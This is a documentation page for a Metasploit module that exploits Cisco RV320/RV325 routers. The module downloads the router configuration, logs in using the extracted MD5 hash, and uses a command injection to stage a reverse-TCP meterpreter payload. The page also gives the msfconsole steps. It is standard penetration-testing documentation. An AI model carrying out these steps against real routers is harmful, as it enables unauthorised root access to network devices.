Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/documentation/modules/exploit/linux/http/cisco_rv32x_rce.md
Views: 11788
Introduction
This module automatically exploits two vulnerabilities to create an effectively unauthenticated remote code execution on RV320 and RV325 routers.
The module will perform the following steps:
First the module will download the configuration. Then it will extract the MD5 password hash for the web interface user. The MD5 password hash is directly accepted during login instead of the plain text password. With the MD5 hash the module will authenticate to the web interface of the router and get a valid authentication cookie.
The second step is using the authentication cookie to send an authenticated request to the web interface which exploits a command injection vulnerability. The injection is limited to ~50 characters. Therefore, the module uses a web server to stage a shell payload for the MIPS64 architecture of the router. Depending on the payload the module will result in a shell or meterpreter session.
Vulnerable Application:
Cisco Small Business Routers RV320 and RV325 with firmware versions between 1.4.2.15 and 14.2.20.
Link to vulnerable Firmware Version: https://software.cisco.com/download/home/284005929/type/282465789/release/1.4.2.20?i=!pp
Links to Advisories: Part 1 of the exploit (configuration download): https://www.redteam-pentesting.de/en/advisories/rt-sa-2018-002/-cisco-rv320-unauthenticated-configuration-export
Part 2 of the exploit (command injection in web interface): https://www.redteam-pentesting.de/en/advisories/rt-sa-2018-004/-cisco-rv320-command-injection
Advisories by vendor: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-info https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-inject
Options
RHOSTS
Configure the remote vulnerable system.
RPORT
Configure the TCP port of the HTTP/HTTPS management web interface.
USE_SSL
This flag controls whether the remote management web interface is accessible via HTTPS or not. Should be false for HTTP and true for HTTPS.
PAYLOAD
Configure the Metasploit payload that you want to stage. Must be for MIPS64 arch. Set payload Options accordingly.
SRVHOST
The module stages the payload via a web server. This is the binding interface IP. Default can be set to 0.0.0.0.
HTTPDelay
This configures how long the module should wait for the incoming HTTP connection to the HTTP stager.
Verification Steps
Have exploitable RV320 or RV325 router (exampe IP: 192.168.1.1):
Start
msfconsole:Do:
use exploit/linux/http/cisco_rv32x_rceDo:
set RHOSTS 192.168.1.1Do:
set payload linux/mips64/meterpreter_reverse_tcp(Set the MIPS64 payload you want to use)Do:
set LHOST 192.168.1.2(Setting your own IP here, example: 192.168.1.2)Do:
set RPORT 8007(Set the remote Port on which the router web interface is accessible)Do:
runGives you a privileged (uid=0) shell or in the example a meterpreter session.
Scenarios
Exploiting a vulnerable RV320 router with publicly accessible HTTPS web interface on TCP port 443:
Demo example output for the module: